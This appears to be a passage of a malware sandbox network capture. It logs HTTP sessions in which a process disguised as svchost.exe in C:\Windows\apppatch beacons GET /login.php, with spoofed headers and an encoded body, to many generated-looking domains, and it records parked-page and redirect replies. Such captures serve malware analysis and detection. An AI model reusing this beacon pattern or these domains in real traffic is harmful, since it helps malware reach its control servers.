                                                                                                                                                                                                              Aug 23, 2024 18:49:00.838660955 CEST1236INData Raw: 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72
                                                                                                                                                                                                              Data Ascii: ="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.in
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.838679075 CEST896INData Raw: 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e
                                                                                                                                                                                                              Data Ascii: rrentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.844976902 CEST1236INData Raw: 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 69 6e 73 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 63 72 69 70 74 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66
                                                                                                                                                                                                              Data Ascii: length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cs
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.844990969 CEST1236INData Raw: 2c 63 6d 70 49 64 3a 33 31 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 61 5b 32 5d 28 66 61 6c 73 65 2c 74 72 75 65 29 7d 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e
                                                                                                                                                                                                              Data Ascii: ,cmpId:31},true)}else{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.851492882 CEST1236INData Raw: 67 70 70 5f 70 69 6e 67 28 29 7d 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a
                                                                                                                                                                                                              Data Ascii: gpp_ping()}}else{if(g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push(
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.851505995 CEST1236INData Raw: 67 70 70 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73
                                                                                                                                                                                                              Data Ascii: gppReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="funct
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.851519108 CEST896INData Raw: 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61
                                                                                                                                                                                                              Data Ascii: in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascrip
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.855628014 CEST1236INData Raw: 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 32 39 35 39 31 27 20 62 3d 27 33 33 35 34 39 27 20 63 3d 27 67 61 6c 79 71 61 7a 2e 63 6f 6d 27 20 64 3d 27 65 6e
                                                                                                                                                                                                              Data Ascii: r){}}</script><meta name="tids" content="a='29591' b='33549' c='galyqaz.com' d='entity_mapped'" /><title>Galyqaz.com</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-widt


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              74192.168.2.45639044.221.84.105806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.795012951 CEST374OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vocyzit.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431671|1724431621|25|2|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.339868069 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431739|1724431621|46|3|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              75192.168.2.456391172.234.222.143806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.818416119 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              76192.168.2.4563923.94.10.34806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.899947882 CEST374OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lymyxid.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431672|1724431621|25|2|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.438848972 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431739|1724431621|46|3|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              77192.168.2.45639369.162.80.5880
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.133737087 CEST318OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyfyj.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.720093966 CEST772INHTTP/1.1 200 OK
                                                                                                                                                                                                              accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                              cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              content-length: 481
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              server: nginx
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 44 51 7a 4f 44 6b 7a 4f 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 30 4e 44 4d 78 4e 7a 4d 35 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6d 34 32 61 6a 46 32 4d 57 6b 34 62 47 52 75 5a 47 46 30 4d 57 63 77 59 6d 4e 78 4e 44 63 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 51 30 4d 7a 45 33 4d 7a [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODkzOSwiaWF0IjoxNzI0NDMxNzM5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42ajF2MWk4bGRuZGF0MWcwYmNxNDciLCJuYmYiOjE3MjQ0MzE3MzksInRzIjoxNzI0NDMxNzM5NjU1MzU3fQ.93jHNDe653NfZkCJsNnTuXM0ey0AS4uxh9LM4mPx99U&sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88');</script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              78192.168.2.45639485.17.31.122806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.355257988 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              79192.168.2.456395172.234.222.143806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.373905897 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              80192.168.2.45639691.195.240.19806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.382220030 CEST277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: www.gahyqah.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.092837095 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                              last-modified: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-89b87dbbb-pdp8m
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 38 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 859<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From ge
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.094475031 CEST1236INData Raw: 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c
                                                                                                                                                                                                              Data Ascii: neral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.p
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.094486952 CEST1236INData Raw: 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f
                                                                                                                                                                                                              Data Ascii: style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=res
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.102341890 CEST1236INData Raw: 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e
                                                                                                                                                                                                              Data Ascii: -item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;t
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.102353096 CEST1236INData Raw: 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d
                                                                                                                                                                                                              Data Ascii: tainer-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-a
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.110156059 CEST801INData Raw: 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74 69
                                                                                                                                                                                                              Data Ascii: ont-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:ce
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.110168934 CEST1236INData Raw: 31 42 34 45 0d 0a 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78
                                                                                                                                                                                                              Data Ascii: 1B4E}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.117014885 CEST1236INData Raw: 70 78 3b 77 69 64 74 68 3a 32 36 70 78 3b 6c 65 66 74 3a 34 70 78 3b 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61
                                                                                                                                                                                                              Data Ascii: px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}inpu
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.117027044 CEST1236INData Raw: 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2d 63 75 72 76 65
                                                                                                                                                                                                              Data Ascii: iner-content__left{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;z-index:-1;top:50px;position:inherit}.container-content__right{background:url("//img.
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.117038012 CEST1236INData Raw: 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70
                                                                                                                                                                                                              Data Ascii: ds.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-el
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.121284008 CEST1236INData Raw: 30 7d 2e 64 6f 6d 61 69 6e 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72
                                                                                                                                                                                                              Data Ascii: 0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center}#plBanner{margin:0px 0px 20px 0px;width:100%;height:140px;text-align:center}.nc-img{w


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              81192.168.2.45639885.17.31.122806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.285015106 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              82192.168.2.456399154.212.231.82806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.763436079 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.672589064 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:49:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
